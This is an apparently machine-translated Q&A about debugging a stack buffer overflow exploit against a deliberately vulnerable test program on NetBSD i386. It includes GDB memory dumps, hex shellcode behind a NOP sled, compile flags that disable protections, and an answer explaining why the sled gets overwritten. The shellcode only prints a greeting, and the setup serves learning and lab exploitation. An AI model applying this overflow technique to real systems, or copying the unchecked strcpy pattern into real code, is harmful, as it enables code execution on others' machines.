我正在尝试利用测试程序中的缓冲区溢出来执行任意代码。我在NetBSD 6 i386上。这是C代码:
int checkPassword(char *password)
{
char savePassword[64] = {0};
char *logMessage;
int isUser = 0;
int isAdmin = 0;
int i;
if (!strcmp(password, userPassword))
isUser = 1;
strcpy(savePassword, password);
for (i = 0; password[i]; ++i)
password[i] ^= xorKey;
if (!strcmp(password, adminPassword))
isAdmin = 1;
if (!(isAdmin | isUser)) {
/* ... */
}
return isAdmin ? ADMIN : isUser ? USER : NOBODY; /* main.c:79 */
}
我将代码插入savePassword缓冲区(%ebp - 0x58)。这是使用GDB的调试:
# gdb -q ./pepito
Reading symbols from /root/Pepito/source/pepito...done.
(gdb) b main.c:79
Breakpoint 1 at 0x80490f4: file main.c, line 79.
(gdb) r debug
Starting program: /root/Pepito/source/pepito debug
Daemon started
Breakpoint 1, checkPassword (password=0xbb901000 '�' <repeats 57 times>, "\345Q?Y?\005?T?T�\r\345Td3\a?T�\035\060\071\071:u\":'91_-\352\352") at main.c:79
79 return isAdmin ? ADMIN : isUser ? USER : NOBODY;
我打破了函数返回,然后我确保在堆栈上正确写入任意代码(96字节长度):
(gdb) x/96xb $ebp-0x58
0xbfbfd560: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbfd568: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbfd570: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbfd578: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbfd580: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbfd588: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbfd590: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbfd598: 0x90 0xb0 0x04 0x6a 0x0c 0x6a 0x50 0x6a
0xbfbfd5a0: 0x01 0x6a 0x01 0xcd 0x60 0x00 0x00 0x00
0xbfbfd5a8: 0x31 0xd2 0x66 0x52 0x6a 0x01 0xcd 0x80
0xbfbfd5b0: 0x48 0x65 0x6c 0x6c 0x6f 0x20 0x77 0x6f
0xbfbfd5b8: 0x72 0x6c 0x64 0x0a 0x78 0xd5 0xbf 0xbf
然后我继续直到ret汇编指令:
(gdb) nexti
(gdb) nexti
(gdb) nexti
(gdb) nexti
(gdb) nexti
(gdb) nexti
(gdb) nexti
(gdb) x/i $eip
=> 0x8049119 <checkPassword+393>: ret
然后我检查堆栈顶部的返回地址(%esp):
(gdb) x/xw $esp
0xbfbfd5bc: 0xbfbfd578
这个地址将由ret加速,然后我们会跳过它。让我们看看我们在该地址的说明:
(gdb) x/50i 0xbfbfd578
0xbfbfd578: nop
0xbfbfd579: nop
0xbfbfd57a: nop
[...]
0xbfbfd597: nop
0xbfbfd598: nop
0xbfbfd599: mov al,0x4
0xbfbfd59b: push 0xc
0xbfbfd59d: push 0x50
0xbfbfd59f: push 0x1
0xbfbfd5a1: push 0x1
0xbfbfd5a3: int 0x60
我们的任意代码!
但是如果我执行ret它的段错误:
(gdb) nexti
Program received signal SIGSEGV, Segmentation fault.
0x08049119 in checkPassword (password=0xbb901000 '�' <repeats 57 times>, "\345Q?Y?\005?T?T�\r\345Td3\a?T�\035\060\071\071:u\":'91_-\352\352") at main.c:80
80 }
(gdb) x/i $eip
=> 0x8049119 <checkPassword+393>: ret
操作系统似乎禁止我跳过堆栈内存。但我禁用了不可执行的堆栈保护:
gcc -m32 -g -fno-stack-protector -D_FORTIFY_SOURCE=0 -c main.c
gcc main.o daemon.o network.o utils.o -o pepito -m32 -L./lib_netbsd -lsecret -Wl,-rpath,./lib_netbsd -Wl,-z,execstack
readelf确认我们堆栈是可执行的:
# readelf -l pepito
Elf file type is EXEC (Executable file)
Entry point 0x8048d60
There are 7 program headers, starting at offset 52
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
[...]
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4
答案 0 :(得分:-1)
在我的方框中,通过 strcpy 调用溢出 savePassword 后。我收到了以下指示:
0x80484ba: movl $ 0x0,-0x14(%ebp)
它对应于局部变量 i 初始化为0
for (i = 0; password[i]; ++i)
这会破坏注入代码中的NOP sled,从而在执行过程中引发了一个段错误。看看你的身边。如果它是相同的(我几乎可以肯定它),那么你可以简单地将你的shellcode移动到有效载荷的开始,并摆脱NOP雪橇。
正如Fermat2357所说,考虑在ret指令之前发布函数转储以及整个有效负载。
<强> GCC
gcc版本4.8.0 20130502(预发布)(GCC)
已编译:
gcc -m32 -ggdb -fno-stack-protector -z execstack -D_FORTIFY_SOURCE = 0 vuln.c -o vuln
<强>段
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#define ADMIN 2
#define USER 1
#define NOBODY 0
char* userPassword = "S3cuRe";
char* adminPassword = "4dm1n";
int xorKey = 0;
int checkPassword(char *password)
{
char savePassword[64] = {0};
char *logMessage;
int isUser = 0;
int isAdmin = 0;
int i;
if (!strcmp(password, userPassword))
isUser = 1;
strcpy(savePassword, password);
for (i = 0; password[i]; ++i)
password[i] ^= xorKey;
if (!strcmp(password, adminPassword))
isAdmin = 1;
if (!(isAdmin | isUser)) {
}
return isAdmin ? ADMIN : isUser ? USER : NOBODY;
}
void main(int argc, char *argv[])
{
int user = NOBODY;
user = checkPassword(argv[1]);
printf("Hello %d\n", user);
}